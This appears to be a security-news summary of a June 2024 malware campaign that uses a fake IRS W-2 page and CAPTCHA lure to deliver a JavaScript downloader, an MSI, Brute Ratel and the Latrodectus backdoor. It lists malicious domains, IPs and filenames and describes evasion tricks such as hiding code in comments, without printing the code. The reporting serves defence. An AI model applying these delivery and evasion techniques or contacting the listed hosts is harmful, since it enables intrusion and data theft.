Summary: A malicious campaign launched on June 21, 2024, involved the distribution of a JavaScript file that executed an MSI installer, leading to the installation of the Brute Ratel Badger and the Latrodectus backdoor, allowing remote control and data theft. The attack utilized a fake IRS website to lure victims and employed sophisticated obfuscation techniques to evade detection.
Threat Actor: Unknown | Brute Ratel
Victim: General public | IRS
Key Point :
- The campaign involved a malicious JavaScript file that downloaded and executed MSI installers, leading to the installation of stealthy malware.
- Threat actors used a fake IRS website to trick users into solving a CAPTCHA, which initiated the download of the malicious script.
- Obfuscation techniques were employed to hide malicious code within comments, enhancing the malware’s ability to evade detection.
- The malware included a valid authentication certificate to increase its legitimacy and deceive users.
- Multi-stage malware infection was confirmed, with connections to multiple command-and-control domains for further payload delivery.
A malicious campaign emerged on June 21, 2024, distributing a JavaScript file hosted on grupotefex.com, which executes an MSI installer, subsequently dropping a Brute Ratel Badger DLL into the user’s AppData.
The command-and-control framework Brute Ratel then downloads and inserts the stealthy Latrodectus backdoor, which gives threat actors remote control, the ability to steal data, and the ability to send out more payloads.
Zscaler ThreatLabz independently verified Brute Ratel’s involvement as an initial access broker for the Latrodectus malware family on June 23.
An attacker leveraged Bing search results to redirect users from a lookalike domain (appointopia.com) to a fake IRS website (hxxps://grupotefex.com/forms-pubs/about-form-w-2/).
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
Clicking on the website triggered a CAPTCHA challenge. Solving the seemingly innocuous CAPTCHA resulted in downloading a malicious JavaScript file (Form_Ver-*.js) hosted on a Google Firebase storage bucket, which likely initiated the next stage of the attack.
.webp)
Analysis of the JS file `Form_ver-14-00-21.js` revealed a malicious code obfuscation technique where threat actors concealed malicious code within seemingly innocuous comments.
The file leveraged a ScriptHandler class to extract hidden code starting with ‘/////’ and execute it using `new Function()`, which effectively hides malicious payloads, inflates file size, and evades antivirus detection.
Additionally, the file’s inclusion of a valid authentication certificate enhances its legitimacy, emphasizing the threat actor’s intent to deceive.
.webp)
The `Form_ver-14-00-21.js` script revealed its sole purpose as a downloader and executor of MSI packages from specified URLs by retrieving the MSI named “BST.msi” from the IP address 85.208.108.63 and initiating its installation.
A similar incident on June 25th involved a different script downloading another MSI, “neuro.msi,” from a closely related IP, 85.208.108.30, indicating a potential campaign targeting systems with identical malicious payloads.
.webp)
Rapid7 analyzed an MSI file named neuro.msi and found it contained a cabinet archive (disk1.cab) with a DLL named capisp.dll.
The MSI installer also included a custom action that dropped capisp.dll into the user’s AppData/Roaming folder and executed it using rundll32.exe with the export named “remi,” which suggests that the MSI package installs and runs capisp.dll, likely for a purpose related to the “remi” export function.
.webp)
capisp.dll revealed a multi-stage malware infection chain, while the DLL associated with VLC contains an encrypted resource decrypted using a hardcoded XOR key.
The decrypted data is a loader for a packed Brute Ratel Badger (BRC4) payload, which connects to multiple C2 domains and downloads Latrodectus malware, which is injected into Explorer.exe and communicates with several additional C2 URLs.
Protect Your Business Emails From Spoofing, Phishing & BEC with AI-Powered Security | Free Demo
Source: https://gbhackers.com/hackers-target-w2-form-searchers